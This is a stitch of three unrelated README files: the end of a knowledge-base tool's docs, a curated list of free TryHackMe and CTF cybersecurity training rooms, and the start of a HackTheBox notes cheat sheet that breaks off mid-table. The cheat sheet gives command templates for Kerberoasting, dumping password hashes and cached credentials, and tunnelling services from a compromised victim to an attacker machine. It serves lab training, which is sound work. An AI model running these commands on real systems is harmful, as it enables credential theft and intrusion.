knowledge base from the remote git repository with: ```sh kb sync pull ``` We can at any time view to what remote endpoint our knowledge is synchronizing to with: ```sh kb sync info ``` ## UPGRADE If you want to upgrade kb to the most recent stable release do: ```sh pip install -U kb-manager ``` If instead you want to update kb to the most recent release (that may be bugged), do: ```sh git clone https://github.com/gnebbia/kb cd kb pip install --upgrade . ``` ## DONATIONS I am an independent developer working on kb in my free time, if you like kb and would like to say thank you, buy me a beer! [![paypal](https://www.paypalobjects.com/en_US/i/btn/btn_donateCC_LG.gif)](https://paypal.me/nebbione) ## COPYRIGHT Copyright 2020 Giuseppe Nebbione. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>.
# Awesome Cyber Security University Overview 🎓 Because Education should be free. Contributions welcome! 🕵️ [🏠 Home](/README.md) · [🔥 Feed](https://www.trackawesomelist.com/brootware/awesome-cyber-security-university/rss.xml) · [📮 Subscribe](https://trackawesomelist.us17.list-manage.com/subscribe?u=d2f0117aa829c83a63ec63c2f&id=36a103854c) · [❤️ Sponsor](https://github.com/sponsors/theowenyoung) · [😺 brootware/awesome-cyber-security-university](https://github.com/brootware/awesome-cyber-security-university) · ⭐ 488 · 🏷️ Security [ [Daily](/content/brootware/awesome-cyber-security-university/README.md) / [Weekly](/content/brootware/awesome-cyber-security-university/week/README.md) / Overview ] --- # Awesome Cyber Security University [![Awesome](https://awesome.re/badge.svg)](https://awesome.re) > A curated list of awesome and free educational resources that focuses on learn by doing. <div align="center"> <a href="https://brootware.github.io/awesome-cyber-security-university/"><img src="https://github.com/brootware/awesome-cyber-security-university/raw/main/assets/purpleteam.png" width="250"/></a> <br/> <i>Because education should be free.</i> <br/> <a href="https://brootware.github.io/awesome-cyber-security-university/"><img src="https://visitor-badge.glitch.me/badge?page_id=brootware.cyber-security-university&right_color=blue" /></a> </div> ## Contents * [About](#about) * [Introduction and Pre-Security](#introduction-and-pre-security) - (Completed/In Progress) * [Free Beginner Red Team Path](#free-beginner-red-team-path) - (Add your badge here. The badge code is hidden in this repo) * [Free Beginner Blue Team Path](#free-beginner-blue-team-path) - (Add your badge here. The badge code is hidden in this repo) * [Bonus CTF practice and Latest CVEs](#bonus-ctf-practice-and-latest-cves) - (Completed/In Progress) * [Bonus Windows](#bonus-windows) - (Completed/In Progress) * [Extremely Hard Rooms to do](#extremely-hard-rooms-to-do) - (Completed/In Progress) <!-- | Paths | Completion | | -------------------------------- | ---------------------| |[Introduction and Pre-Security](#-introduction-and-pre-security) |(Completed/In Progress) | |[Free Beginner Red Team Path](#-free-beginner-red-team-path) |(Add your badge here. Badge code is hidden in this repo) | |[Free Beginner Blue Team Path](#-free-beginner-blue-team-path) |(Add your badge here. Badge code is hidden in this repo) | |[Bonus CTF practice & Latest CVEs](#-bonus-ctf-practice-and-latest-cves)|(Completed/In Progress)| |[Bonus Windows](#-bonus-windows)|(Completed/In Progress)| |[Extremely Hard Rooms to do](#-extremely-hard-rooms-to-do) |(Completed/In Progress) | --> ## About Cyber Security University is A curated list of awesome and free educational resources that focus on learning by doing. There are 6 parts to this. Introduction and Pre-security, Free Beginner Red Team Path, Free Beginner Blue Team Path, Bonus practices/latest CVEs and Extremely Hard rooms to do. The tasks are linear in nature of the difficulty. So it's recommended to do it in order. But you can still jump around and skip some rooms If you find that you are already familiar with the concepts. <!--lint disable double-link--> As you go through the curriculum, you will find completion badges that are hidden within this [`README.md`](https://github.com/brootware/Cyber-Security-University/blob/main/README.md) for both red and blue team path completion badges. You can copy the HTML code for them and add it to the content page below once you have completed them. <!--lint disable double-link--> [↑](#contents) <!--lint enable double-link--> ## Contributing Pull requests are welcome with the condition that the resource should be free! Please read the [contribution guide in the wiki (⭐488)](https://github.com/brootware/Cyber-Security-University/wiki) if you wish to add tools or resources. ## Introduction and Pre-Security ### Level 1 - Intro <!--lint disable double-link--> * [OpenVPN](https://tryhackme.com/room/openvpn) - Learn how to connect to a virtual private network using OpenVPN.<!--lint enable double-link--> * [Welcome](https://tryhackme.com/jr/welcome) - Learn how to use a TryHackMe room to start your upskilling in cyber security. * [Intro to Researching](https://tryhackme.com/room/introtoresearch) - A brief introduction to research skills for pentesting. * [Linux Fundamentals 1](https://tryhackme.com/room/linuxfundamentalspart1) - Embark on the journey of learning the fundamentals of Linux. Learn to run some of the first essential commands on an interactive terminal. * [Linux Fundamentals 2](https://tryhackme.com/room/linuxfundamentalspart2) - Embark on the journey of learning the fundamentals of Linux. Learn to run some of the first essential commands on an interactive terminal. * [Linux Fundamentals 3](https://tryhackme.com/room/linuxfundamentalspart3) - Embark on the journey of learning the fundamentals of Linux. Learn to run some of the first essential commands on an interactive terminal. * [Pentesting fundamentals](https://tryhackme.com/room/pentestingfundamentals) - Fundamentals of penetration testing. * [Principles of security](https://tryhackme.com/room/principlesofsecurity) - Principles of security. * [Red Team Engagements](https://tryhackme.com/room/redteamengagements) - Intro to red team engagements. * [Hip Flask](https://tryhackme.com/room/hipflask) - An in-depth walkthrough covering pentest methodology against a vulnerable server. <!-- markdownlint-disable MD036 --> **Introductory CTFs to get your feet wet**<!-- markdownlint-enable MD036 --> * [Google Dorking](https://tryhackme.com/room/googledorking) - Explaining how Search Engines work and leveraging them into finding hidden content! * [Osint](https://tryhackme.com/room/ohsint) - Intro to Open Source Intelligence. * [Shodan.io](https://tryhackme.com/room/shodan) - Learn about Shodan.io and how to use it for device enumeration. <!--lint disable double-link--> [↑](#contents)<!--lint enable double-link--> ## Free Beginner Red Team Path ### Level 2 - Tooling * [Tmux](https://tryhackme.com/room/rptmux) - Learn to use tmux, one of the most powerful multi-tasking tools on linux. * [Nmap](https://tryhackme.com/room/rpnmap) - Get experience with Nmap, a powerful network scanning tool. * [Web Scanning](https://tryhackme.com/room/rpwebscanning) - Learn the basics of automated web scanning. * [Sublist3r](https://tryhackme.com/room/rpsublist3r) - Learn how to find subdomains with Sublist3r. * [Metasploit](https://tryhackme.com/room/rpmetasploit) - An introduction to the main components of the Metasploit Framework. * [Hydra](https://tryhackme.com/room/hydra) - Learn about and use Hydra, a fast network logon cracker, to bruteforce and obtain a website's credentials. * [Linux Privesc](https://tryhackme.com/room/linuxprivesc) - Practice your Linux Privilege Escalation skills on an intentionally misconfigured Debian VM with multiple ways to get root! SSH is available. * [Red Team Fundamentals](https://tryhackme.com/room/redteamfundamentals) - Learn about the basics of a red engagement, the main components and stakeholders involved, and how red teaming differs from other cyber security engagements. * [Red Team Recon](https://tryhackme.com/room/redteamrecon) - Learn how to use DNS, advanced searching, Recon-ng, and Maltego to collect information about your target. <!-- markdownlint-disable MD036 --> **Red Team Intro CTFs**<!-- markdownlint-enable MD036 --> * [Vulnversity](https://tryhackme.com/room/vulnversity) - Learn about active recon, web app attacks and privilege escalation. * [Blue](https://tryhackme.com/room/blue) - Deploy & hack into a Windows machine, leveraging common misconfigurations issues. * [Simple CTF](https://tryhackme.com/room/easyctf) - Beginner level CTF. * [Bounty Hacker](https://tryhackme.com/room/cowboyhacker) - A space cowboy-themed boot to root machine. <!--lint disable double-link--> [↑](#contents)<!--lint enable double-link--> ### Level 3 - Crypto & Hashes with CTF practice * [Crack the hash](https://tryhackme.com/room/crackthehash) - Cracking hash challenges. * [Agent Sudo](https://tryhackme.com/room/agentsudoctf) - You found a secret server located under the deep sea. Your task is to hack inside the server and reveal the truth. * [The Cod Caper](https://tryhackme.com/room/thecodcaper) - A guided room taking you through infiltrating and exploiting a Linux system. * [Ice](https://tryhackme.com/room/ice) - Deploy & hack into a Windows machine, exploiting a very poorly secured media server. * [Lazy Admin](https://tryhackme.com/room/lazyadmin) - Easy linux machine to practice your skills. * [Basic Pentesting](https://tryhackme.com/room/basicpentestingjt) - This is a machine that allows you to practice web app hacking and privilege escalation. * [Bypassing UAC](https://tryhackme.com/room/bypassinguac) - Learn common ways to bypass User Account Control (UAC) in Windows hosts. <!--lint disable double-link--> [↑](#contents)<!--lint enable double-link--> ### Level 4 - Web * [OWASP top 10](https://tryhackme.com/room/owasptop10) - Learn about and exploit each of the OWASP Top 10 vulnerabilities; the 10 most critical web security risks. * [Inclusion](https://tryhackme.com/room/inclusion) - A beginner-level LFI challenge. * [Injection](https://tryhackme.com/room/injection) - Walkthrough of OS Command Injection. Demonstrate OS Command Injection and explain how to prevent it on your servers. * [Juiceshop](https://tryhackme.com/room/owaspjuiceshop) - This room uses the OWASP juice shop vulnerable web application to learn how to identify and exploit common web application vulnerabilities. * [Overpass](https://tryhackme.com/room/overpass) - What happens when some broke CompSci students make a password manager. * [Year of the Rabbit](https://tryhackme.com/room/yearoftherabbit) - Can you hack into the Year of the Rabbit box without falling down a hole. * [DevelPy](https://tryhackme.com/room/bsidesgtdevelpy) - Boot2root machine for FIT and bsides Guatemala CTF. * [Jack of all trades](https://tryhackme.com/room/jackofalltrades) - Boot-to-root originally designed for Securi-Tay 2020. * [Bolt](https://tryhackme.com/room/bolt) - Bolt themed machine to root into. <!--lint disable double-link--> [↑](#contents)<!--lint enable double-link--> ### Level 5 - Reverse Engineering & Pwn * [Intro to x86 64](https://tryhackme.com/room/introtox8664) - This room teaches the basics of x86-64 assembly language. * [CC Ghidra](https://tryhackme.com/room/ccghidra) - This room teaches the basics of ghidra. * [CC Radare2](https://tryhackme.com/room/ccradare2) - This room teaches the basics of radare2. * [Reverse Engineering](https://tryhackme.com/room/reverseengineering) - This room focuses on teaching the basics of assembly through reverse engineering. * [Reversing ELF](https://tryhackme.com/room/reverselfiles) - Room for beginner Reverse Engineering CTF players. * [Dumping Router Firmware](https://tryhackme.com/room/rfirmware) - Reverse engineering router firmware. * [Intro to pwntools](https://tryhackme.com/room/introtopwntools) - Introduction to popular pwn tools framework. * [Pwnkit: CVE-2021-4034](https://tryhackme.com/room/pwnkit) - Interactive lab for exploiting and remediating Pwnkit (CVE-2021-4034) in the Polkit package. <!--lint disable double-link--> [↑](#contents)<!--lint enable double-link--> ### Level 6 - PrivEsc * [Sudo Security Bypass](https://tryhackme.com/room/sudovulnsbypass) - A tutorial room exploring CVE-2019-14287 in the Unix Sudo Program. Room One in the SudoVulns Series. * [Sudo Buffer Overflow](https://tryhackme.com/room/sudovulnsbof) - A tutorial room exploring CVE-2019-18634 in the Unix Sudo Program. Room Two in the SudoVulns Series. * [Windows Privesc Arena](https://tryhackme.com/room/windowsprivescarena) - Students will learn how to escalate privileges using a very vulnerable Windows 7 VM. * [Linux Privesc Arena](https://tryhackme.com/room/linuxprivescarena) - Students will learn how to escalate privileges using a very vulnerable Linux VM. * [Windows Privesc](https://tryhackme.com/room/windows10privesc) - Students will learn how to escalate privileges using a very vulnerable Windows 7 VM. * [Blaster](https://tryhackme.com/room/blaster) - Metasploit Framework to get a foothold. * [Ignite](https://tryhackme.com/room/ignite) - A new start-up has a few security issues with its web server. * [Kenobi](https://tryhackme.com/room/kenobi) - Walkthrough on exploiting a Linux machine. Enumerate Samba for shares, manipulate a vulnerable version of proftpd and escalate your privileges with path variable manipulation. * [Capture the flag](https://tryhackme.com/room/c4ptur3th3fl4g) - Another beginner-level CTF challenge. * [Pickle Rick](https://tryhackme.com/room/picklerick) - Rick and Morty themed LFI challenge. > Congratulations! If you have finished until here. You deserve a badge! Put this in your writeups or git profile. You can continue doing the below CTFs. <details> <summary>Click here to get your red team badge!</summary> <https://gist.github.com/brootware/e30a10dbccf334eb95da7ea59d6f87fe> </details> <!--lint disable double-link--> [↑](#contents)<!--lint enable double-link--> ## Free Beginner Blue Team Path ### Level 1 - Tools * [Introduction to digital forensics](https://tryhackme.com/room/introdigitalforensics) - Intro to Digital Forensics. * [Windows Fundamentals](https://tryhackme.com/room/windowsfundamentals1xbx) - Intro to Windows. * [Nessus](https://tryhackme.com/room/rpnessusredux) - Intro to nessus scan. * [Mitre](https://tryhackme.com/room/mitre) - Intro to Mitre attack framework. * [IntroSIEM](https://tryhackme.com/room/introtosiem) - Introduction to SIEM. * [Yara](https://tryhackme.com/room/yara) - Intro to yara for malware analysis. * [OpenVAS](https://tryhackme.com/room/openvas) - Intro to openvas. * [Intro to Honeypots](https://tryhackme.com/room/introductiontohoneypots) - Intro to honeypots. * [Volatility](https://tryhackme.com/room/bpvolatility) - Intro to memory analysis with volatility. * [Red Line](https://tryhackme.com/room/btredlinejoxr3d) - Learn how to use Redline to perform memory analysis and scan for IOCs on an endpoint. * [Autopsy](https://tryhackme.com/room/autopsy2ze0) - Use Autopsy to investigate artifacts from a disk image. <!--lint disable double-link--> [↑](#contents)<!--lint enable double-link--> ### Level 2 - Security Operations, Incident Response & Threat Hunting * [Investigating Windows](https://tryhackme.com/room/investigatingwindows) - Investigating Windows. * [Juicy Details](https://tryhackme.com/room/juicydetails) - A popular juice shop has been breached! Analyze the logs to see what had happened. * [Carnage](https://tryhackme.com/room/c2carnage) - Apply your analytical skills to analyze the malicious network traffic using Wireshark. * [Squid Game](https://tryhackme.com/room/squidgameroom) - Squid game-themed CTF. * [Splunk Boss of the SOC V1](https://tryhackme.com/room/bpsplunk) - Part of the Blue Primer series, learn how to use Splunk to search through massive amounts of information. * [Splunk Boss of the SOC V2](https://cyberdefenders.org/blueteam-ctf-challenges/16) - Splunk analysis vol 2. * [Splunk Boss of the SOC V3](https://cyberdefenders.org/blueteam-ctf-challenges/8) - Splunk analysis vol 3. * [Hunt Conti with Splunk](https://tryhackme.com/room/contiransomwarehgh) - An Exchange server was compromised with ransomware. Use Splunk to investigate how the attackers compromised the server. * [Hunting for Execution Tactic](https://info.cyborgsecurity.com/en-us/threat-hunting-workshop-3) - Join Cyborg Security's expert threat hunters as they dive into the interesting MITRE ATT\&CK Tactic of Execution (TA0002). * [Hunting for Credential Access](https://info.cyborgsecurity.com/en-us/threat-hunting-workshop-5) - Join Cyborg Security's expert threat hunters as they dive into the interesting MITRE ATT\&CK Tactic of Credential Access (TA0006). * [Hunting for Persistence Access](https://info.cyborgsecurity.com/en-us/threat-hunting-workshop-2) - Join Cyborg Security's team of threat hunting instructors for a fun and hands-on-keyboard threat hunting workshop covering the topic of adversarial persistence (TA0003). * [Hunting for Defense Evation](https://info.cyborgsecurity.com/en-us/threat-hunting-workshop-4) - Join Cyborg Security's expert threat hunters as they dive into the interesting MITRE ATT\&CK Tactic of Defense Evasion (TA0005). <!--lint disable double-link--> [↑](#contents) <!--lint enable double-link--> ### Level 3 - Beginner Forensics & Cryptography * [Martryohka doll](https://play.picoctf.org/practice/challenge/129?category=4\&page=1\&solved=0) - Beginner file analysis challenge. * [The Glory of the Garden](https://play.picoctf.org/practice/challenge/44?category=4\&page=1\&solved=0) - Beginner image analysis challenge. * [Packets Primer](https://play.picoctf.org/practice/challenge/286?category=4\&page=2\&solved=0) - Beginner packet analysis challenge. * [Wireshark doo doo doo](https://play.picoctf.org/practice/challenge/115?category=4\&page=1\&solved=0) - Beginner packet analysis challenge. * [Wireshark two two two](https://play.picoctf.org/practice/challenge/110?category=4\&page=1\&solved=0) - Beginner packet analysis challenge. * [Trivial flag transfer protocol](https://play.picoctf.org/practice/challenge/103?category=4\&page=1\&solved=0) - Beginner packet analysis challenge. * [What Lies within](https://play.picoctf.org/practice/challenge/74?category=4\&page=2\&solved=0) - Beginner decoding analysis challenge. * [Illumination](https://app.hackthebox.com/challenges/illumination) - Medium level forensics challenge. * [Emo](https://app.hackthebox.com/challenges/emo) - Medium level forensics challenge. * [Obsecure](https://app.hackthebox.com/challenges/obscure) - Medium level forensics challenge. * [Bucket - Cloud Security Forensics](https://cyberdefenders.org/blueteam-ctf-challenges/84) - Medium level cloud security challenge. * [Introduction to Cryptohack](https://cryptohack.org/courses/intro/course_details/) - Medium level cryptography challenge. <!--lint disable double-link--> [↑](#contents)<!--lint enable double-link--> ### Level 4 - Memory & Disk Forensics * [Sleuthkit Intro](https://play.picoctf.org/practice/challenge/301?category=4\&page=2\&solved=0) - Medium level disk forensics challenge. * [Reminiscent](https://app.hackthebox.com/challenges/reminiscent) - Medium level disk forensics challenge. * [Hunter - Windows Disk Image Forensics](https://cyberdefenders.org/blueteam-ctf-challenges/32) - Medium level disk forensics challenge. * [Spotlight - Mac Disk Image Forensics](https://cyberdefenders.org/blueteam-ctf-challenges/34) - Medium level disk forensics challenge. * [Ulysses - Linux Disk Image Forensics](https://cyberdefenders.org/blueteam-ctf-challenges/41) - Medium level disk forensics challenge. * [Banking Troubles - Windows Memory Image Forensics](https://cyberdefenders.org/blueteam-ctf-challenges/43) - Medium level memory forensics challenge. * [Detect Log4J](https://cyberdefenders.org/blueteam-ctf-challenges/86) - Medium level disk forensics challenge. <!--lint disable double-link--> [↑](#contents)<!--lint enable double-link--> ### Level 5 - Malware and Reverse Engineering * [History of Malware](https://tryhackme.com/room/historyofmalware) - Intro to malware history. * [Malware Introduction](https://tryhackme.com/room/malmalintroductory) - Intro to malware. * [Basic Malware Reverse Engineering](https://tryhackme.com/room/basicmalwarere) - Intro to malware RE. * [Intro Windows Reversing](https://tryhackme.com/room/windowsreversingintro) - Intro to Windows RE. * [Windows x64 Assembly](https://tryhackme.com/room/win64assembly) - Introduction to x64 Assembly on Windows. * [JVM reverse engineering](https://tryhackme.com/room/jvmreverseengineering) - Learn Reverse Engineering for Java Virtual Machine bytecode. * [Get PDF (Malicious Document)](https://cyberdefenders.org/blueteam-ctf-challenges/47) - Reversing PDF malware. > Congratulations! If you have finished until here. You deserve a badge! Put this in your writeups or git profile. You can continue doing the below CTFs. <details> <summary>Click here to get your blue team badge!</summary> <https://gist.github.com/brootware/62b76a84aaa8d6f55c82f6f329ad6d2d> </details> <!--lint disable double-link--> [↑](#contents)<!--lint enable double-link--> ## Bonus CTF practice and Latest CVEs * [Bandit](https://overthewire.org/wargames/bandit/) - Aimed at absolute beginners and teaches the basics of remote server access. * [Natas](https://overthewire.org/wargames/natas/) - Teaches the basics of serverside web-security. * [Post Exploitation Basics](https://tryhackme.com/room/postexploit) - Learn the basics of post-exploitation and maintaining access with mimikatz, bloodhound, powerview and msfvenom. * [Smag Grotto](https://tryhackme.com/room/smaggrotto) - An obsecure boot to root machine. * [Dogcat](https://tryhackme.com/room/dogcat) - I made a website where you can look at pictures of dogs and/or cats! Exploit a PHP application via LFI and break out of a docker container. * [Buffer Overflow Prep](https://tryhackme.com/room/bufferoverflowprep) - Practice stack-based buffer overflows. * [Break out the cage](https://tryhackme.com/room/breakoutthecage1) - Help Cage bring back his acting career and investigate the nefarious going on of his agent. * [Lian Yu](https://tryhackme.com/room/lianyu) - A beginner-level security challenge. * [Insecure Kubernetes](https://tryhackme.com/room/insekube) - Exploiting Kubernetes by leveraging a Grafana LFI vulnerability. * [The Great Escape (docker)](https://tryhackme.com/room/thegreatescape) - Escaping docker container. * [Solr Exploiting Log4j](https://tryhackme.com/room/solar) - Explore CVE-2021-44228, a vulnerability in log4j affecting almost all software under the sun. * [Spring4Shell](https://tryhackme.com/room/spring4shell) - Interactive lab for exploiting Spring4Shell (CVE-2022-22965) in the Java Spring Framework. * [Most Recent threats](https://tryhackme.com/module/recent-threats) - Learn about the latest industry threats. Get hands-on experience identifying, exploiting, and mitigating critical vulnerabilities. <!--lint disable double-link--> [↑](#contents)<!--lint enable double-link--> ## Bonus Windows * [Attacktive Directory](https://tryhackme.com/room/attacktivedirectory) - Learn about 99% of Corporate networks that run off of AD. * [Retro](https://tryhackme.com/room/retro) - Breaking out of the retro-themed box. * [Blue Print](https://tryhackme.com/room/blueprint) - Hack into this Windows machine and escalate your privileges to Administrator. * [Anthem](https://tryhackme.com/room/anthem) - Exploit a Windows machine in this beginner-level challenge. * [Relevant](https://tryhackme.com/room/relevant) - Penetration Testing Challenge. <!--lint disable double-link--> [↑](#contents)<!--lint enable double-link--> ## Extremely Hard Rooms to do * [Ra](https://tryhackme.com/room/ra) - You have found WindCorp's internal network and their Domain Controller. Pwn the network. * [CCT2019](https://tryhackme.com/room/cct2019) - Legacy challenges from the US Navy Cyber Competition Team 2019 Assessment sponsored by US TENTH Fleet. * [Theseus](https://tryhackme.com/room/theseus) - The first installment of the SuitGuy series of very hard challenges. * [IronCorp](https://tryhackme.com/room/ironcorp) - Get access to Iron Corp's system. * [Carpe Diem 1](https://tryhackme.com/room/carpediem1) - Recover your client's encrypted files before the ransomware timer runs out. * [Borderlands](https://tryhackme.com/room/borderlands) - Compromise a perimeter host and pivot through this network. * [Jeff](https://tryhackme.com/room/jeff) - Hack into Jeff's web server. * [Year of the Owl](https://tryhackme.com/room/yearoftheowl) - Owl-themed boot to root machine. * [Anonymous Playground](https://tryhackme.com/room/anonymousplayground) - Want to become part of Anonymous? They have a challenge for you. * [EnterPrize](https://tryhackme.com/room/enterprize) - Enterprise-themed network to hack into. * [Racetrack Bank](https://tryhackme.com/room/racetrackbank) - It's time for another heist. * [Python Playground](https://tryhackme.com/room/pythonplayground) - Use python to pwn this room. <!--lint disable double-link--> [↑](#contents)<!--lint enable double-link--> ## Footnotes **Inspired by** <https://skerritt.blog/free-rooms/> ### Contributors & stargazers ✨ <!-- ALL-CONTRIBUTORS-BADGE:START - Do not remove or modify this section --> [![All Contributors](https://img.shields.io/badge/all_contributors-2-orange.svg?style=flat-square)](#contributors-) <!-- ALL-CONTRIBUTORS-BADGE:END --> Special thanks to everyone who forked or starred the repository ❤️ [![Stargazers repo roster for @brootware/awesome-cyber-security-university](https://reporoster.com/stars/dark/brootware/awesome-cyber-security-university)](https://github.com/brootware/awesome-cyber-security-university/stargazers) [![Forkers repo roster for @brootware/awesome-cyber-security-university](https://reporoster.com/forks/dark/brootware/awesome-cyber-security-university)](https://github.com/brootware/awesome-cyber-security-university/network/members) Thanks goes to these wonderful people ([emoji key](https://allcontributors.org/docs/en/emoji-key)): <!-- ALL-CONTRIBUTORS-LIST:START - Do not remove or modify this section --> <!-- prettier-ignore-start --> <!-- markdownlint-disable --> <table> <tr> <td align="center"><a href="https://brootware.github.io"><img src="https://avatars.githubusercontent.com/u/7734956?v=4?s=100" width="100px;" alt=""/><br /><sub><b>Oaker Min</b></sub></a><br /><a href="#infra-brootware" title="Infrastructure (Hosting, Build-Tools, etc)">🚇</a> <a href="#maintenance-brootware" title="Maintenance">🚧</a> <a href="https://github.com/brootware/cyber-security-university/commits?author=brootware" title="Documentation">📖</a> <a href="https://github.com/brootware/cyber-security-university/commits?author=brootware" title="Code">💻</a></td> <td align="center"><a href="https://lucidcode.com"><img src="https://avatars.githubusercontent.com/u/1631870?v=4?s=100" width="100px;" alt=""/><br /><sub><b>Michael Paul Coder</b></sub></a><br /><a href="https://github.com/brootware/cyber-security-university/commits?author=IAmCoder" title="Documentation">📖</a></td> </tr> </table> <!-- markdownlint-restore --> <!-- prettier-ignore-end --> <!-- ALL-CONTRIBUTORS-LIST:END --> This project follows the [all-contributors (⭐7k)](https://github.com/all-contributors/all-contributors) specification. Contributions of any kind are welcome! <!--lint disable double-link--> [↑](#contents)<!--lint enable double-link-->
# hackthebox [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT) ![GitHub repo size](https://img.shields.io/github/repo-size/cyberwr3nch/hackthebox) <br /> ![GitHub Repo stars](https://img.shields.io/github/stars/cyberwr3nch/hackthebox?style=social) ![GitHub forks](https://img.shields.io/github/forks/cyberwr3nch/hackthebox?style=social) ![GitHub watchers](https://img.shields.io/github/watchers/cyberwr3nch/hackthebox?style=social) Notes Taken for HTB Machine<br /> Will be periodiclly updated, created with the intend of unwraping all possible ways and to prep for exams<br /> created & maintained by: **cyberwr3nch** # Contents - [Command Reference](#cr) - [Tools](#tools) - [Bloggers](#blog) ### Commands Reference <a name='cr'></a> | File | Contents | | ---- | -------- | | [Active Directory](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/commands/Active%20Directory.md) | Bruteforce SMB, Winrm Bruteforce, AD User Enumeration, Mounting Disks, BloodHound, rpcclinet | | [Directory Enumeration](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/commands/Directory%20Enumeration.md) | gobuster, rustbuster, wfuzz, vhosts | | [File Transfer](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/commands/FileTransfer.md) | ftp, python, netcat, http, powershell curling, metasploit, smb, net use, impackets | | [Nmap](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/commands/Nmap.md) | Nmap, PortScanning, Tags | | [Notes](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/commands/Notes.md) | DNS Recon, 302 Redirects, Burpsuite, MySQL, Passwd File, Port Forwarding | | [Password Cracking](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/commands/Password%20Cracking.md) | hashcat, john, hashexamples, zip file cracking | | [Post Exploitation](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/commands/PostExploitationCommands.md) | current user, network infos, locate, Antivirus Disabling, registry, priviledges, running process, plink, stored credentials, wmic | | [Regular Commands](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/commands/Regular%20Commands.md) | ls, Grep, AWK, Curl, wget, Compression and decompression of files, Find, xclip, Misc, bashLoops, sed, tr, tail, watch | | [Reverse Shells](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/commands/Reverse%20Shell.md) | Bash TCP, Bash UDP, Netcat, Telnet, Socat, Perl, Python, PHP, Ruby, SSL, Powershell, AWK, TCLsh, Java, LUA, MSF Reverse Shells(war, exe, elf, macho, aspx, jsp, python, sh, perl), Xterm, Magicbytes, Exiftool, Simple PHP oneliners | | [Web Attacks](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/commands/WebAttacks.md) | sql-injection, login bruteforce( wfuzz, hydra) | | [Docker Commands](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/commands/Docker%20Commands.md) | installation, building, pulling, updating, deleting, listing, cheatsheet | | [Git Commands](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/commands/Git%20Commands.md) | clone, commit, push, pull, add, log, deleted file, checkout | | [Pivoting](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/commands/Pivoting.md) | POST Exploitation, Pivoting, Chisel | ### Tools <a name='tools'></a> #### Windows and Active Directory | Tool | Use | Command Syntax | | ---- | --- | -------------- | | [Bloodhound.py](https://github.com/cyberwr3nch/hackthebox/tree/master/tools/BloodHound.py) | BloodHound written in python. Used to obtain AD infromations from a windows machine | `python3 bloodhound-python -u <username> -p <passphrase> -ns <machineIP> -d <domainname> -c all` | | [Impackets](https://github.com/SecureAuthCorp/impacket) | Swiss Knife for most Windows AD attacks | `python GetNPUsers.py <domain_name>/ -usersfile <users_file>` = ASREPRoasting <br /> `python GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password>` = Kerberoasting | | [Kerbrute](https://github.com/ropnop/kerbrute) | A tool written in GO to enumerate AD users | `./kerbrute userenum --dc <machine ip> -d <doaminname> <users_file>` | | [CredDump](https://github.com/cyberwr3nch/hackthebox/tree/master/tools/creddump) | Used to obtain Cached Credentials, LSA Secrets and Password hash when system and sam files are available | `./pwdump.py <system hive> <sam hive>` = Obtain Password Credentials <br /> `./cachedump.py <system hive> <sam hive>` = obtain cached credentials <br /> `./lsadum.py <system hive> <sam hive>` = Obtain LSA Dumps | | [PwdDump](https://github.com/cyberwr3nch/hackthebox/tree/master/tools/pwdump) | After getting the `administrative` access, running this will get the password hashes | `.\PwDump7.exe`| | [ApacheDirectoryStudio](https://directory.apache.org/studio/downloads.html) | LDAP browser which is used to analyze LDAP instance running on linux (CREDS required), here transferring the LDAP running on a victim machine and accessing it in the attacker machine | `sudo ssh -L 389:172.20.0.10:389 lynik-admin@10.10.10.189` | #### Port Forwarding | Tool | Use | Command Syntax| | ---- | --- | -------------- | | [Chisel](https://github.com/cyberwr3nch/hackthebox/tree/master/tools/chisel) | Used to forward a service running on a port in the victim machine | `./chisel server -p <port no.> --reverse` = on the attacker machine <br /> `./chisel client <attackerip:port> R:1234:127.0.0.1:1121` = Forwards the service running on port 1121 to the port 1234 on attackers machine | | [socat](https://github.com/craSH/socat) | Swiss Knife for Port forwarding | `socat TCP-LISTEN:8000,fork TCP:<machineIP>:<port>` = Listens on every connection to port `8000` and forwards to the `machineIP` and its `port` <br /> `socat TCP-LISTEN:9002,bind=<specific ip>,fork,reuseaddr TCP:localhost:<port>` = forward all incoming requests to the port 9002 from <specific ip> to the localhost port, reuseaddr is used to specify socat use the address (eg. localhost) even if its used by other services| | [plink](https://github.com/Plotkine/pentesting/blob/master/Windows_privilege_escalation/Windows-privesc-tib3rius/plink.exe) | SSH Putty in CLI mode | `.\plink.exe <user@host> -R <remote port>:<localhost>:<local port>` .\plink.exe kali@10.10.14.32 -R 8888:127.0.0.1:8888 = port forwards the service running on victim machines port 8888 to the attacker machines 8888 | | ssh | uses the built in ssh service to port forward a service | **Remote Port Forwarding:** <br /> > Command should be entered on the compromied machine<br />`ssh <user@host> -R <host>:<port open in host>:<localhost>:<port in victim machine> -N -f` <br /> ssh cyberwr3nch@192.168.XX.XX -R 192.168.XX.XX:3000:127.0.0.1:80 -N -f = Open the port 3000 in the cyberwr3nch's machine and forwards the service running in port 80 to the cyberwr3nch's 3000. So visiting 127.0.0.1:3000 in cyberwr3nch's browser will be the same of visiting 127.0.0.1:80 on the victim machine <br /> ================ <br /> **Dynamic Port Forwarding:** <br /> > Command to be executed on the attacker machine <br /> `ssh -D <port on attacker machine> <victim@victim_machine>`<br /> ssh -D 1234 victim@192.168.XX.XX = Command to be executed on the attackers machine, the port 1234 should be configured in the `/etc/proxychains.conf` as `socks4 127.0.0.1 1234`. If SSH Dynamic port forwarding fails, go for chisel method <br /> ================ <br /> **Local Port 